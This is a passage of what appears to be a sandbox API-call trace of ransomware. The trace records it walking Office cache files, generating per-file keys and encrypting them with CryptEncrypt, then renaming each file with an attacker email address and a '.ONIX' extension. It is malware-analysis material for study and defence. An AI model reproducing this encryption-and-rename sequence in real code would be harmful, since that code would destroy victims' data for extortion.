lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.615] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.615] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0095.615] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0095.615] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi", dwFileAttributes=0x80) returned 1 [0095.615] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 79 [0095.615] GetProcessHeap () returned 0x410000 [0095.615] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10e) returned 0x467908 [0095.615] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" [0095.615] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0095.615] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=873984) returned 1 [0095.615] SetFilePointer (in: hFile=0x38c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xd5600 [0095.616] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0095.616] GetProcessHeap () returned 0x410000 [0095.616] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0095.616] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0095.616] WriteFile (in: hFile=0x38c, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0095.618] WriteFile (in: hFile=0x38c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0095.619] WriteFile (in: hFile=0x38c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0095.620] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd5600) returned 0x2680020 [0095.620] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd5600) returned 0x2b30020 [0095.620] SetFilePointer (in: hFile=0x38c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.620] ReadFile (in: hFile=0x38c, lpBuffer=0x2680020, nNumberOfBytesToRead=0xd5600, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2680020*, lpNumberOfBytesRead=0x367f44c*=0xd5600, lpOverlapped=0x0) returned 1 [0095.661] UnlockFile (hFile=0x38c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xd5600, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0095.661] CloseHandle (hObject=0x38c) returned 1 [0095.667] GetProcessHeap () returned 0x410000 [0095.667] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0095.667] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0095.669] GetProcessHeap () returned 0x410000 [0095.669] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0095.669] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0095.669] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0095.669] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0095.669] FindNextFileW (in: hFindFile=0x48ea70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Office32MUI.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0095.669] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.669] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.669] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4585b0 [0095.669] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.669] GetLastError () returned 0x0 [0095.669] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x38c [0095.669] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0095.669] LockFile (hFile=0x38c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x567, nNumberOfBytesToLockHigh=0x0) returned 1 [0095.670] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.670] ReadFile (in: hFile=0x38c, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0095.673] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.673] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.673] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0095.673] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0095.673] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", dwFileAttributes=0x80) returned 1 [0095.673] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned 79 [0095.673] GetProcessHeap () returned 0x410000 [0095.673] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10e) returned 0x467908 [0095.673] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" [0095.673] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0095.673] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1383) returned 1 [0095.674] SetFilePointer (in: hFile=0x38c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x567 [0095.674] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0095.674] GetProcessHeap () returned 0x410000 [0095.674] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0095.674] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0095.674] WriteFile (in: hFile=0x38c, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0095.675] WriteFile (in: hFile=0x38c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0095.677] WriteFile (in: hFile=0x38c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0095.678] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x567) returned 0x4b6b68 [0095.678] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x567) returned 0x4b70d8 [0095.678] SetFilePointer (in: hFile=0x38c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.678] ReadFile (in: hFile=0x38c, lpBuffer=0x4b6b68, nNumberOfBytesToRead=0x567, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b6b68*, lpNumberOfBytesRead=0x367f44c*=0x567, lpOverlapped=0x0) returned 1 [0095.678] SetFilePointer (in: hFile=0x38c, lDistanceToMove=-1383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.678] WriteFile (in: hFile=0x38c, lpBuffer=0x4b70d8*, nNumberOfBytesToWrite=0x567, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b70d8*, lpNumberOfBytesWritten=0x367f44c*=0x567, lpOverlapped=0x0) returned 1 [0095.679] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b6b68 | out: hHeap=0x410000) returned 1 [0095.679] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b70d8 | out: hHeap=0x410000) returned 1 [0095.679] UnlockFile (hFile=0x38c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x567, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0095.679] CloseHandle (hObject=0x38c) returned 1 [0095.680] GetProcessHeap () returned 0x410000 [0095.680] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0095.680] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0095.682] GetProcessHeap () returned 0x410000 [0095.682] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0095.682] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0095.682] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0095.682] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0095.682] FindNextFileW (in: hFindFile=0x48ea70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc301560, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2cb13b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OWOW32LR.cab", cAlternateFileName="")) returned 1 [0095.682] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.682] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.682] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4585b0 [0095.682] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.682] GetLastError () returned 0x0 [0095.683] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x38c [0095.683] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0095.683] LockFile (hFile=0x38c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2cb13b, nNumberOfBytesToLockHigh=0x0) returned 1 [0095.683] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.683] ReadFile (in: hFile=0x38c, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0095.685] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.685] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.685] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0095.685] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0095.685] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", dwFileAttributes=0x80) returned 1 [0095.685] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 76 [0095.685] GetProcessHeap () returned 0x410000 [0095.685] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x467908 [0095.685] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" [0095.685] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0095.685] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2928955) returned 1 [0095.685] SetFilePointer (in: hFile=0x38c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x2cb13b [0095.685] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0095.685] GetProcessHeap () returned 0x410000 [0095.685] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0095.685] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0095.686] WriteFile (in: hFile=0x38c, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0095.687] WriteFile (in: hFile=0x38c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0095.688] WriteFile (in: hFile=0x38c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0095.689] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2cb13b) returned 0x3680020 [0095.690] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2cb13b) returned 0x3950020 [0095.690] SetFilePointer (in: hFile=0x38c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.690] ReadFile (in: hFile=0x38c, lpBuffer=0x3680020, nNumberOfBytesToRead=0x2cb13b, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x2cb13b, lpOverlapped=0x0) returned 1 [0095.854] UnlockFile (hFile=0x38c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2cb13b, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0095.854] CloseHandle (hObject=0x38c) returned 1 [0095.891] GetProcessHeap () returned 0x410000 [0095.891] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0095.891] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0095.897] GetProcessHeap () returned 0x410000 [0095.897] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0095.897] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0095.897] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0095.897] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0095.897] FindNextFileW (in: hFindFile=0x48ea70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0095.897] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.897] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.897] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4585b0 [0095.897] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.897] GetLastError () returned 0x0 [0095.897] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x38c [0095.898] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0095.898] LockFile (hFile=0x38c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x93a, nNumberOfBytesToLockHigh=0x0) returned 1 [0095.898] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.898] ReadFile (in: hFile=0x38c, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0095.899] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.899] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.900] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0095.900] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0095.900] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0095.900] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0095.900] GetProcessHeap () returned 0x410000 [0095.900] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0095.900] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" [0095.900] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0095.900] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2362) returned 1 [0095.900] SetFilePointer (in: hFile=0x38c, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x93a [0095.900] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0095.900] GetProcessHeap () returned 0x410000 [0095.900] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0095.900] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0095.900] WriteFile (in: hFile=0x38c, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0095.902] WriteFile (in: hFile=0x38c, 